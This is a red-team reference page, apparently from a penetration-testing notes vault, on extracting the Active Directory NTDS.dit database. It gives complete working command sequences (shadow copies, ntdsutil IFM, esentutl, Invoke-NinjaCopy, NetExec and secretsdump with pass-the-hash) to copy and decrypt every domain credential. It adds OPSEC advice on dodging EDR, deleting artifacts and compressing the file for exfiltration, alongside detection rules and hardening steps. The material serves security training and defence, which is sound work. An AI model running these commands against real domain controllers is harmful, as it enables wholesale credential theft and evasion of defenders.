attack-39-ntds-dit-extraction-and-dumping.md (27436B)
1 --- 2 title: "Attack #39 β NTDS.dit Extraction and Dumping" 3 description: "The NTDS.dit file is the Active Directory database stored on every Domain Controller at C:\\Windows\\NTDS\\ntds.dit. It contains all domain credentials (NTβ¦" 4 category: active-directory 5 subcategory: "Domain Controller Attacks" 6 tags: ["active-directory", "kerberos", "credential-access", "hashing"] 7 tools: ["NetExec", "Impacket", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Five/π΅ Attack #39 β NTDS.dit Extraction and Dumping.md" 11 --- 12 # π΅ Attack #39 β NTDS.dit Extraction & Dumping 13 14 *** 15 16 ## π How It Works 17 18 The `NTDS.dit` file is the **Active Directory database** stored on every Domain Controller at `C:\Windows\NTDS\ntds.dit`. It contains all domain credentials (NT hashes, Kerberos keys, password history) for every account. Unlike DCSync (Attack #37, network-based), NTDS.dit extraction requires **local access to a DC** and involves copying the database file along with the SYSTEM registry hive for decryption. 19 20 > [!info]+ Technical Deep-Dive β NTDS.dit Database Internals 21 > 1. NTDS.dit uses the **Extensible Storage Engine (ESE / JET Blue)** database format β the same engine used by Exchange and Windows Search 22 > 2. The database contains multiple tables, but the critical one is the **`datatable`** β it stores all AD objects and their attributes, including the `unicodePwd` (NT hash), `supplementalCredentials` (Kerberos keys, WDigest, cleartext if reversible encryption is enabled), and `lmPwdHistory`/`ntPwdHistory` (password history) 23 > 3. **Encryption layers**: Credential attributes are encrypted with the **Password Encryption Key (PEK)**, which itself is encrypted with the **Boot Key (SYSKEY)** derived from the SYSTEM registry hive (`HKLM\SYSTEM\CurrentControlSet\Control\Lsa\{JD,Skew1,GBG,Data}`) 24 > 4. **Decryption flow**: Extract SYSTEM hive β derive Boot Key β decrypt PEK from NTDS.dit header β use PEK to decrypt individual credential attributes 25 > 5. *The file is locked by the NTDS service while the DC is running β you cannot simply copy it; you must use Volume Shadow Copy, ntdsutil IFM, or other bypass methods* 26 > 6. The database also contains the `link_table` (group memberships), `sd_table` (security descriptors), and `msysobjects` (schema definitions) 27 28 *** 29 30 ## βοΈ Prerequisites 31 32 | Requirement | Detail | 33 |---|---| 34 | **Local admin / SYSTEM on DC** | Required for VSS/ntdsutil/esentutl methods | 35 | **Or domain admin credentials** | For remote extraction methods (secretsdump, NetExec) | 36 | **SYSTEM registry hive** | Required for offline decryption β contains the Boot Key | 37 38 *** 39 40 ## π οΈ Tools 41 42 | Tool | Platform | Version | Notes | 43 |---|---|---|---| 44 | **vssadmin** | Windows (built-in) | All versions | Volume Shadow Copy β most common local extraction method | 45 | **ntdsutil** | Windows (built-in) | All versions | Install From Media (IFM) β creates backup containing NTDS.dit + SYSTEM hive | 46 | [diskshadow](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow) | Windows (built-in) | Server 2008+ | Scriptable VSS alternative β useful for non-interactive shells | 47 | **esentutl** | Windows (built-in) | All versions | ESE database utility β can copy locked files | 48 | **wmic** | Windows (built-in) | Pre-2025 | `shadowcopy create` β another VSS trigger method | 49 | [Impacket β secretsdump.py](https://github.com/fortra/impacket) | Linux | β₯ 0.10.0 | Remote NTDS dump via DRSUAPI or VSS | 50 | [NetExec](https://github.com/Pennyw0rth/NetExec) | Linux | β₯ 1.1.0 | `--ntds vss` or `--ntds drsuapi` β remote one-liner | 51 | [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) | Windows/PowerShell | β₯ 4.7 | `Get-ADDBAccount` β offline NTDS.dit parsing in PowerShell | 52 | [NTDSDumpEx](https://github.com/zcgonvh/NTDSDumpEx) | Windows | Latest | Lightweight C# NTDS.dit parser | 53 | [Invoke-NinjaCopy](https://github.com/PowerShellMafia/PowerSploit) | Windows/PowerShell | PowerSploit 3.0 | Copies locked files by reading raw NTFS volume β bypasses file locks | 54 55 *** 56 57 ## β±οΈ Time-to-Execute Estimates 58 59 | Operation | Time | Notes | 60 |---|---|---| 61 | VSS shadow copy creation | **10β60 seconds** | Depends on drive size | 62 | ntdsutil IFM backup | **30β120 seconds** | Creates full backup directory | 63 | File copy from shadow copy | **5β30 seconds** | Depends on NTDS.dit file size (100MB to 10GB+) | 64 | Remote dump via secretsdump | **1β30 minutes** | Depends on domain size and network speed | 65 | Offline parsing with secretsdump | **30β300 seconds** | CPU-bound; depends on number of accounts | 66 67 *** 68 69 ## π» Full Commands 70 71 ### π΄ Volume Shadow Copy (Most Common Method) 72 73 ```powershell 74 # ββ Create shadow copy of C: ββββββββββββββββββββββββββββββββββββββββββββββββββ 75 vssadmin create shadow /for=C: 76 # Note the Shadow Copy Volume Name (e.g., \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1) 77 78 # ββ Copy NTDS.dit from shadow copy βββββββββββββββββββββββββββββββββββββββββββ 79 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\Temp\ntds.dit 80 81 # ββ Copy SYSTEM hive (needed for decryption) βββββββββββββββββββββββββββββββββ 82 reg save HKLM\SYSTEM C:\Temp\SYSTEM 83 84 # ββ Cleanup β delete shadow copy βββββββββββββββββββββββββββββββββββββββββββββ 85 vssadmin delete shadows /shadow={shadow-id} /quiet 86 ``` 87 88 ### π΄ ntdsutil (Built-in Microsoft Tool) 89 90 ```powershell 91 # ββ Create IFM backup (contains NTDS.dit + registry) βββββββββββββββββββββββββ 92 ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\ntds_backup" quit quit 93 # NTDS.dit β C:\Temp\ntds_backup\Active Directory\ntds.dit 94 # SYSTEM β C:\Temp\ntds_backup\registry\SYSTEM 95 ``` 96 97 ### π΄ diskshadow (Scriptable VSS β Good for Non-Interactive Shells) 98 99 ```powershell 100 # ββ Create diskshadow script βββββββββββββββββββββββββββββββββββββββββββββββββ 101 # Write to C:\Temp\shadow.txt: 102 # set context persistent nowriters 103 # add volume c: alias mydrive 104 # create 105 # expose %mydrive% z: 106 # exit 107 108 # ββ Execute the script βββββββββββββββββββββββββββββββββββββββββββββββββββββββ 109 diskshadow /s C:\Temp\shadow.txt 110 111 # ββ Copy NTDS.dit from the exposed shadow βββββββββββββββββββββββββββββββββββββ 112 copy z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit 113 reg save HKLM\SYSTEM C:\Temp\SYSTEM 114 115 # ββ Cleanup βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 116 diskshadow 117 > delete shadows volume c: 118 > exit 119 ``` 120 121 > [!tip]+ Why diskshadow over vssadmin? 122 > `fas:Lightbulb` 123 > 1. **diskshadow** supports scripted (non-interactive) mode via `/s` flag β useful for reverse shells and C2 where interactive input isn't possible 124 > 2. It can **expose** the shadow copy as a drive letter (e.g., `z:`) β simpler file copy syntax 125 > 3. Some EDR tools specifically monitor for `vssadmin.exe` but miss `diskshadow.exe` β slightly stealthier 126 > 4. *Available on Server 2008+ β not available on Windows client OS (Win 10/11)* 127 128 ### π΄ esentutl (ESE Database Copy β Bypasses File Lock) 129 130 ```powershell 131 # ββ Copy locked NTDS.dit using esentutl βββββββββββββββββββββββββββββββββββββββ 132 esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d C:\Temp\ntds.dit 133 # Uses VSS internally to copy the locked database file 134 135 # ββ Also copy SYSTEM hive βββββββββββββββββββββββββββββββββββββββββββββββββββββ 136 reg save HKLM\SYSTEM C:\Temp\SYSTEM 137 ``` 138 139 ### π΄ wmic Shadow Copy 140 141 ```powershell 142 # ββ Create shadow copy via wmic βββββββββββββββββββββββββββββββββββββββββββββββ 143 wmic shadowcopy call create Volume='C:\' 144 # Note: wmic is deprecated in Server 2025+; use PowerShell CIM instead 145 146 # ββ PowerShell CIM alternative ββββββββββββββββββββββββββββββββββββββββββββββββ 147 (Get-WmiObject -List Win32_ShadowCopy).Create("C:\", "ClientAccessible") 148 ``` 149 150 ### π΄ Invoke-NinjaCopy (PowerSploit β Raw NTFS Read) 151 152 ```powershell 153 # ββ Copy locked NTDS.dit by reading raw NTFS volume ββββββββββββββββββββββββββ 154 Import-Module .\PowerSploit\Exfiltration\Invoke-NinjaCopy.ps1 155 Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\Temp\ntds.dit" 156 # Reads the file by parsing the raw NTFS MFT β bypasses file locks entirely 157 # β οΈ Requires admin privileges and may trigger EDR (raw disk access) 158 ``` 159 160 ### π΄ NetExec / CrackMapExec (Remote β from Linux) 161 162 ```bash 163 # ββ Dump NTDS remotely via VSS ββββββββββββββββββββββββββββββββββββββββββββββββ 164 nxc smb DC01.corp.local -u Administrator -p 'Password1' --ntds vss 165 166 # ββ Via DRSUAPI (DCSync method, not file-based) ββββββββββββββββββββββββββββββ 167 nxc smb DC01.corp.local -u Administrator -p 'Password1' --ntds drsuapi 168 169 # ββ With Pass-the-Hash ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 170 nxc smb DC01.corp.local -u Administrator -H 2b576acbe6bcfda7294d6bd18041b8fe --ntds vss 171 172 # ββ With Kerberos βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 173 export KRB5CCNAME=administrator.ccache 174 nxc smb DC01.corp.local -u Administrator -k --ntds drsuapi 175 ``` 176 177 ### π΄ Impacket β secretsdump.py (Remote) 178 179 ```bash 180 # ββ Full dump with NTDS extraction ββββββββββββββββββββββββββββββββββββββββββββ 181 secretsdump.py corp.local/Administrator:'Password1'@DC01.corp.local \ 182 -just-dc -outputfile domain_dump 183 184 # ββ Using PtH ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 185 secretsdump.py corp.local/Administrator@DC01.corp.local \ 186 -hashes :2b576acbe6bcfda7294d6bd18041b8fe -just-dc -outputfile dump 187 188 # ββ Kerberos authentication βββββββββββββββββββββββββββββββββββββββββββββββββββ 189 export KRB5CCNAME=administrator.ccache 190 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local \ 191 -just-dc -outputfile dump 192 ``` 193 194 ### π΄ Offline Parsing (After Extraction) 195 196 ```bash 197 # ββ Parse NTDS.dit offline with secretsdump βββββββββββββββββββββββββββββββββββ 198 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile parsed_hashes 199 # Outputs: parsed_hashes.ntds, parsed_hashes.ntds.kerberos, parsed_hashes.ntds.cleartext 200 201 # ββ Extract only NT hashes ββββββββββββββββββββββββββββββββββββββββββββββββββββ 202 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -just-dc-ntlm -outputfile nt_only 203 204 # ββ With password history βββββββββββββββββββββββββββββββββββββββββββββββββββββ 205 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -history -outputfile with_history 206 ``` 207 208 ```powershell 209 # ββ DSInternals (PowerShell β offline parsing) ββββββββββββββββββββββββββββββββ 210 Import-Module DSInternals 211 $bootKey = Get-BootKey -SystemHiveFilePath C:\Temp\SYSTEM 212 Get-ADDBAccount -All -DBPath C:\Temp\ntds.dit -BootKey $bootKey | 213 Select-Object SamAccountName, @{N='NTHash';E={$_.NTHash | ConvertTo-Hex}} | 214 Export-Csv domain_hashes.csv -NoTypeInformation 215 216 # ββ Extract specific user βββββββββββββββββββββββββββββββββββββββββββββββββββββ 217 Get-ADDBAccount -SamAccountName krbtgt -DBPath C:\Temp\ntds.dit -BootKey $bootKey 218 ``` 219 220 ```bash 221 # ββ NTDSDumpEx (lightweight C# parser) ββββββββββββββββββββββββββββββββββββββββ 222 NTDSDumpEx.exe -d ntds.dit -s SYSTEM -o hashes.txt 223 ``` 224 225 *** 226 227 ## π― OPSEC Tips 228 229 1. **DCSync (Attack #37) is almost always preferred** β no file access on the DC, no disk artifacts, and can target individual users; use NTDS.dit extraction only when DCSync is blocked (network segmentation, firewall rules) 230 2. **VSS shadow copies leave obvious forensic artifacts** β Event 8222, vssadmin process creation, shadow copy metadata; all are easily detected 231 3. **diskshadow is slightly stealthier than vssadmin** β fewer EDR rules specifically target it, and it supports scripted mode for non-interactive access 232 4. **Clean up shadow copies immediately** β leaving them behind is a dead giveaway; use `vssadmin delete shadows /all /quiet` 233 5. **Exfiltrate the NTDS.dit file off the DC before parsing** β parsing on the DC is slow and leaves a long forensic window; copy to attacker machine and parse offline 234 6. **NTDS.dit files can be enormous** (1β10+ GB in large environments) β consider compression before exfiltration: `Compress-Archive -Path C:\Temp\ntds.dit -DestinationPath C:\Temp\ntds.zip` 235 7. **ntdsutil IFM creates a directory, not a single file** β don't forget to clean up the entire directory after extraction 236 237 ### π OpSec Ranking 238 239 | Method | Stealth | Speed | Reliability | Notes | 240 |---|---|---|---|---| 241 | DCSync (remote, not file-based) | π’ High | π’ Fast | π’ High | Preferred β no DC file access needed (Attack #37) | 242 | secretsdump.py (remote) | π‘ Medium | π‘ Medium | π’ High | Creates temp service + VSS on DC remotely | 243 | diskshadow (local) | π‘ Medium | π‘ Medium | π’ High | Less monitored than vssadmin | 244 | vssadmin (local) | π΄ Low | π‘ Medium | π’ High | Most commonly detected; EDR rules everywhere | 245 | ntdsutil IFM (local) | π΄ Low | π‘ Medium | π’ High | ntdsutil.exe execution is highly suspicious on DCs | 246 | esentutl (local) | π‘ Medium | π‘ Medium | π‘ Medium | Fewer EDR detections but still logs process creation | 247 | Invoke-NinjaCopy (local) | π‘ Medium | π΄ Slow | π‘ Medium | Raw NTFS access may crash on very large databases | 248 249 *** 250 251 ## π‘οΈ Detection β Event IDs 252 253 | Event ID | Source | What to Look For | 254 |---|---|---| 255 | **8222** | Security Log (DC) | Shadow copy created β definitive VSS indicator | 256 | **4688** | Security Log (DC) | Process creation: `vssadmin.exe`, `ntdsutil.exe`, `diskshadow.exe`, `esentutl.exe` | 257 | **Sysmon 1** | Sysmon | Process creation with full command line β look for `ntds.dit`, `ifm`, `shadow` keywords | 258 | **Sysmon 11** | Sysmon | File creation of ntds.dit copy in unusual directory (not `C:\Windows\NTDS\`) | 259 | **7045** | System Log | Service installed (secretsdump creates a temp RemComSvc service for remote execution) | 260 | **4663** | Security Log | File access to `C:\Windows\NTDS\ntds.dit` (requires Object Access auditing configured) | 261 | **1102** | Security Log | Audit log cleared β attacker may attempt to cover tracks after extraction | 262 263 ### π Sigma Rules 264 265 ```yaml 266 # ββ SigmaHQ β NTDS.dit Access via VSS βββββββββββββββββββββββββββββββββββββββ 267 title: NTDS.dit Access via Volume Shadow Copy 268 id: c5c50bfa-5f39-497f-b862-41c3a9e455bc 269 status: stable 270 logsource: 271 product: windows 272 category: process_creation 273 detection: 274 selection_vss: 275 Image|endswith: 276 - '\vssadmin.exe' 277 - '\diskshadow.exe' 278 CommandLine|contains: 279 - 'create shadow' 280 - 'create' 281 selection_ntdsutil: 282 Image|endswith: '\ntdsutil.exe' 283 CommandLine|contains: 'ifm' 284 condition: selection_vss or selection_ntdsutil 285 level: critical 286 tags: 287 - attack.credential_access 288 - attack.t1003.003 289 ``` 290 291 ```yaml 292 # ββ SigmaHQ β NTDS.dit File Copy βββββββββββββββββββββββββββββββββββββββββββββ 293 title: Suspicious NTDS.dit File Access 294 id: 8bc64091-6875-4881-aaf1-f1c1bd6469cd 295 logsource: 296 product: windows 297 category: file_event 298 detection: 299 selection: 300 TargetFilename|contains: 'ntds.dit' 301 TargetFilename|endswith: '.dit' 302 filter_legitimate: 303 TargetFilename|startswith: 'C:\Windows\NTDS\' 304 condition: selection and not filter_legitimate 305 level: critical 306 ``` 307 308 ### π‘οΈ EDR-Specific Detections 309 310 > [!warning]+ Microsoft Defender for Identity (MDI) 311 > 1. **"Suspected NTDS.dit theft"** β detects ntdsutil IFM creation and VSS-based NTDS.dit access patterns 312 > 2. MDI correlates process creation on DCs with known NTDS.dit extraction command patterns 313 > 3. *MDI is less effective for NTDS.dit extraction than for DCSync because the extraction happens locally, not over the network* 314 315 > [!warning]+ CrowdStrike Falcon 316 > 1. **"NTDS.dit Credential Dumping"** β behavioral detection for VSS creation followed by ntds.dit file access 317 > 2. **"Volume Shadow Copy Abuse"** β flags vssadmin/diskshadow when combined with file access to sensitive paths 318 > 3. Process tree analysis detects `cmd.exe β vssadmin.exe β copy ntds.dit` chains 319 320 > [!warning]+ Elastic Security 321 > 1. Rule: **"NTDS or SAM Database File Copied"** β file event monitoring for ntds.dit copies outside the NTDS directory 322 > 2. Rule: **"Volume Shadow Copy Creation"** β process creation monitoring for vssadmin/diskshadow with shadow creation arguments 323 > 3. Rule: **"Credential Dumping via NTDSutil"** β specific ntdsutil IFM command detection 324 325 *** 326 327 ## π¬ Forensic Artifacts 328 329 | Artifact | Location | Details | 330 |---|---|---| 331 | **Shadow copy metadata** | VSS storage (`System Volume Information`) | Shadow copy creation/deletion timestamps; may persist even after deletion | 332 | **Event 8222** | DC Security Log | Shadow copy creation event with timestamp and volume information | 333 | **Process execution** | Event 4688 / Sysmon 1 | vssadmin.exe, ntdsutil.exe, diskshadow.exe, esentutl.exe with full command lines | 334 | **File creation** | Sysmon 11 | ntds.dit file created in non-standard location (C:\Temp, C:\Users, etc.) | 335 | **IFM directory** | Disk forensics | `ntds_backup\Active Directory\ntds.dit` + `ntds_backup\registry\SYSTEM` directory structure | 336 | **Temp service** | Event 7045 / System Log | secretsdump.py creates RemComSvc service for remote execution; service name and binary path logged | 337 | **Prefetch** | `C:\Windows\Prefetch\` | `VSSADMIN.EXE-*.pf`, `NTDSUTIL.EXE-*.pf` β execution timestamps survive tool cleanup | 338 | **USN Journal** | NTFS `$UsnJrnl:$J` | File creation/deletion entries for ntds.dit copies | 339 340 *** 341 342 > [!important]+ Windows Server Version Differences 343 > 1. **Server 2012 R2**: All extraction methods work; minimal built-in detection 344 > 2. **Server 2016**: vssadmin event logging improved; Sysmon recommended for file-level monitoring 345 > 3. **Server 2019**: Credential Guard protects LSASS but does **NOT** protect NTDS.dit file extraction β the file is a separate attack surface 346 > 4. **Server 2022**: No new NTDS.dit protection mechanisms; Microsoft recommends MDI + EDR on DCs 347 > 5. **Server 2025**: `wmic.exe` is deprecated/removed β use PowerShell CIM cmdlets instead for shadow copy creation; all other methods still work 348 > 6. *Microsoft's strategic direction is to move credentials out of NTDS.dit entirely (e.g., cloud-only identities with Entra ID), but hybrid AD environments will have NTDS.dit for the foreseeable future* 349 350 *** 351 352 ## π Hardening & Prevention 353 354 ```powershell 355 # ββ 1. Monitor VSS shadow copy creation on DCs βββββββββββββββββββββββββββββββ 356 # GPO β Computer Configuration β Windows Settings β Security Settings β 357 # Advanced Audit Policy β Object Access β Audit Other Object Access Events 358 # This generates Event 4663 for sensitive file access 359 360 # ββ 2. Application whitelisting on DCs ββββββββββββββββββββββββββββββββββββββββ 361 # Use AppLocker or WDAC to restrict what can run on DCs: 362 # Block: vssadmin.exe from non-admin contexts 363 # Block: ntdsutil.exe from non-admin scheduled tasks 364 # Block: PowerShell constrained language mode for non-admins 365 366 # ββ 3. Monitor file access to NTDS.dit βββββββββββββββββββββββββββββββββββββββ 367 # Configure SACL on C:\Windows\NTDS\ntds.dit: 368 $acl = Get-Acl "C:\Windows\NTDS\ntds.dit" 369 $rule = New-Object System.Security.AccessControl.FileSystemAuditRule( 370 "Everyone", "Read", "Success" 371 ) 372 $acl.AddAuditRule($rule) 373 Set-Acl "C:\Windows\NTDS\ntds.dit" $acl 374 # β οΈ Will generate events for legitimate NTDS operations too β tune carefully 375 376 # ββ 4. Enable command-line logging in process creation events βββββββββββββββββ 377 # GPO β Computer Configuration β Admin Templates β System β Audit Process Creation 378 # β Include command line in process creation events 379 # This makes Event 4688 include the full command line 380 381 # ββ 5. Deploy Sysmon on all DCs ββββββββββββββββββββββββββββββββββββββββββββββ 382 # Sysmon config for NTDS.dit monitoring: 383 # <FileCreate onmatch="include"> 384 # <TargetFilename condition="contains">ntds.dit</TargetFilename> 385 # </FileCreate> 386 # <ProcessCreate onmatch="include"> 387 # <Image condition="end with">vssadmin.exe</Image> 388 # <Image condition="end with">ntdsutil.exe</Image> 389 # <Image condition="end with">diskshadow.exe</Image> 390 # </ProcessCreate> 391 392 # ββ 6. Restrict remote access to DCs βββββββββββββββββββββββββββββββββββββββββ 393 # Implement Tiered Administration: 394 # Only Tier 0 admin accounts should have interactive/remote logon rights on DCs 395 # Deny logon locally/RDP for standard domain admins on DCs 396 # Block SMB access to DCs from workstation VLANs (where possible) 397 398 # ββ 7. EDR on Domain Controllers βββββββββββββββββββββββββββββββββββββββββββββ 399 # Deploy EDR agent (Defender for Endpoint, CrowdStrike, etc.) on ALL DCs 400 # Configure real-time monitoring for credential theft patterns 401 ``` 402 403 *** 404 405 ## π§© Troubleshooting 406 407 | Error | Cause | Fix | 408 |---|---|---| 409 | `vssadmin: Error: Access is denied` | Not running as admin / SYSTEM on the DC | Elevate to local admin; use `psexec -s cmd` for SYSTEM context | 410 | `secretsdump: STATUS_ACCESS_DENIED` | Account doesn't have admin rights on DC | Verify DA membership; try `-hashes` for PtH or `-k` for Kerberos auth | 411 | `ERROR_SHARING_VIOLATION` when copying ntds.dit | Trying to copy the live file without VSS | Use VSS shadow copy, ntdsutil IFM, or esentutl `/y /vss` β cannot copy the live file directly | 412 | secretsdump returns `Cannot open NTDS.dit` | Incorrect file path or corrupted database | Verify file path; if parsing offline, ensure both `ntds.dit` and `SYSTEM` files are from the same DC | 413 | Offline parsing returns garbage / wrong hashes | SYSTEM hive doesn't match the NTDS.dit | The SYSTEM hive must be from the SAME DC as the NTDS.dit β different DCs have different Boot Keys | 414 | ntdsutil IFM fails with `error 0xc00002e1` | NTDS service not running or database inconsistent | Run `ntdsutil β files β integrity` first; the service must be running for IFM creation | 415 | Shadow copy creation hangs | Low disk space or VSS writer failure | Check `vssadmin list writers` for failed writers; ensure at least 10% free disk space on the volume | 416 | NetExec `--ntds vss` returns timeout | Large NTDS.dit file + slow network | Increase timeout with `--timeout 300`; or extract locally and parse offline | 417 418 *** 419 420 ## πΊοΈ MITRE ATT&CK 421 422 | Tactic | Technique ID | Sub-technique | Procedure | APT Groups | 423 |---|---|---|---|---| 424 | **Credential Access** | [T1003](https://attack.mitre.org/techniques/T1003/) | [.003 β NTDS](https://attack.mitre.org/techniques/T1003/003/) | Extract NTDS.dit via VSS/ntdsutil/diskshadow and parse offline for all domain credentials | [APT28](https://attack.mitre.org/groups/G0007/) (Fancy Bear), [FIN6](https://attack.mitre.org/groups/G0037/), [Wizard Spider](https://attack.mitre.org/groups/G0102/) | 425 | **Collection** | [T1005](https://attack.mitre.org/techniques/T1005/) | Data from Local System | Copy NTDS.dit and SYSTEM hive files from the DC filesystem | Commonly used by ransomware operators | 426 | **Defense Evasion** | [T1006](https://attack.mitre.org/techniques/T1006/) | Direct Volume Access | Use Invoke-NinjaCopy to read raw NTFS volume bypassing file locks | Advanced red team operations | 427 428 > [!tip]+ Real-World APT Usage 429 > `fas:Lightbulb` 430 > 1. **APT28 (Fancy Bear)** β Used ntdsutil IFM extraction after gaining DC access in government network compromises 431 > 2. **Wizard Spider (Ryuk/Conti)** β Frequently used `vssadmin create shadow` + NTDS.dit extraction as part of their domain compromise playbook before deploying ransomware 432 > 3. **FIN6** β Extracted NTDS.dit for offline credential cracking to access payment processing systems 433 > 4. *NTDS.dit extraction is considered "noisier" than DCSync but is still widely used when network-level replication is blocked* 434 435 *** 436 437 ## π Attack Chain Context 438 439 ``` 440 [NTDS.dit] βββ Direct Database Extraction β All Domain Credentials 441 β 442 ββββ π DCSync (Attack #37) is preferred β no DC file access needed 443 ββββ π Useful when: network segmentation blocks DCSync RPC 444 ββββ π Extract KRBTGT hash β Golden Ticket (Attack #11) 445 ββββ π» Extract all NT hashes β Pass-the-Hash (Attack #4) 446 ββββ π Offline cracking of all domain passwords 447 ββββ π Requires: local admin / SYSTEM on DC, or remote admin via secretsdump 448 ββββ π Defeated by: monitor shadow copy creation, EDR on DCs, Sysmon file monitoring 449 ``` 450 451 *** 452 453 > β **Attack #39 β NTDS.dit Extraction complete.**